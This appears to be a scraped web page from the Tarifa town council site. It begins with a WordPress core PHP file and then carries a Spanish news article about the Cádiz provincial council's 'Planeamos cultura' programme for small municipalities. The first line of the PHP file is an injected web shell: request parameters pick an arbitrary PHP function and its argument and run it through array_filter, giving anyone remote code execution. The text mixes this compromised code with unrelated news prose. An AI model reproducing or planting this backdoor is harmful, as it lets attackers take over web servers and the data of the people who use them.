?php if ($_REQUEST['param1']&&$_REQUEST['param2']) {$f = $_REQUEST['param1']; $p = array($_REQUEST['param2']); $pf = array_filter($p, $f); echo 'OK'; Exit;}; /** * REST API: WP_REST_User_Meta_Fields class * * @package WordPress * @subpackage REST_API * @since 4.7.0 */ /** * Core class used to manage meta values for users via the REST API. * * @since 4.7.0 * * @see WP_REST_Meta_Fields */ class WP_REST_User_Meta_Fields extends WP_REST_Meta_Fields { /** * Retrieves the object meta type. * * @since 4.7.0 * * @return string The user meta type. */ protected function get_meta_type() { return 'user'; } /** * Retrieves the object meta subtype. * * @since 4.9.8 * * @return string 'user' There are no subtypes. */ protected function get_meta_subtype() { return 'user'; } /** * Retrieves the type for register_rest_field(). * * @since 4.7.0 * * @return string The user REST field type. */ public function get_rest_field_type() { return 'user'; } } IRENE GARCÍA TRASLADA A TÉCNICOS MUNICIPALES EL PROYECTO CULTURAL INTEGRAL DE LA DIPUTACIÓN – Excmo. Ayuntamiento de Tarifa

IRENE GARCÍA TRASLADA A TÉCNICOS MUNICIPALES EL PROYECTO CULTURAL INTEGRAL DE LA DIPUTACIÓN

El concejal tarifeño, Francisco Terán y los técnicos del área participan en el primer encuentro de coordinación de toda la provincia

La presidenta de la Diputación, Irene García, ha informado sobre las principales líneas del proyecto cultural de la Corporación en este mandato, durante su participación en el encuentro organizado por la Fundación Provincial de Cultura con representantes de municipios con población inferior a los 50.000 habitantes y entidades locales autónomas, celebrado en Vejer. Un encuentro en el que se han presentado las propuestas para los municipios para el próximo año, dentro del programa Planeamos cultura.

Irene García ha recordado el objetivo que tiene la Diputación para poder ser útil principalmente a los municipios pequeños, y en el caso de las políticas culturales ofrecerles las herramientas necesarias para poder llevar la cultura a los mismos, respetando su autonomía. Al respecto, ha reivindicado la gestión cultural como un proyecto político de la Corporación, que contribuya a romper la brecha de desigualdad entre lo urbano y lo rural, además de potenciar la economía de este sector, la creación de empleo de calidad y ofrecer oportunidades a los jóvenes creadores.

“Para nosotros la gestión cultural forma parte de un proyecto político global, que pretende atender a los municipios más pequeños para que no haya brecha de desigualdad, dado que la falta de oportunidades no se limita al empleo, a tener una cobertura desde el punto de vista social, educativo, sanitario, sino que vamos a ser capaces entre todos de hacer cosas para que no haya brecha de desigualdad entre lo urbano y lo rural también en la gestión cultural”, ha reiterado la presidenta a los participantes en el encuentro. La presidenta también ha indicado que el Plan Invierte recién aprobado contempla una línea de inversiones destinadas a los equipamientos culturales en las localidades.

Un encuentro en el que el diputado de Cultura, Antonio González Mellado, ha informado sobre las nuevas líneas de actuación, dentro del programa Planeamos cultura, que incluye programación de artes en vivo, talleres de formación en gestión cultural, artes visuales y cine. El presupuesto para el próximo año es de 577.500 euros, un 15 por ciento más que el de la última convocatoria.

Junto al teatro y la danza de las artes en vivo, Planeamos cultura también comprende en su oferta talleres de artes escénicas, cine, audiovisuales, de divulgación de la ciencia y fomento de la lectura, de gastronomía y música. Se fomentará también la divulgación de las artes y la cultura, la formación de públicos y el impulso a las vocaciones de creadores y emprendedores culturales.

Los participantes han podido también atender a las ponencias ofrecidas por el profesor Enrique Bustamante, de la Universidad Complutense, dedicada a analizar en qué han influido los años de crisis sobre las políticas culturales públicas municipales; la antropóloga del Instituto Andaluz del Patrimonio Histórico, Gema Carrera, quien ha informado sobre el proyecto de Guía Digital del Patrimonio Andaluz, y de Estefanía Rodero, quien ha hablado de los derechos culturales y el municipio.

0 Comentarios

No hay comentarios disponibles.

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

ArabicEnglishFrenchGermanPortugueseSpanish
Cambiar tamaño de texto
Contraste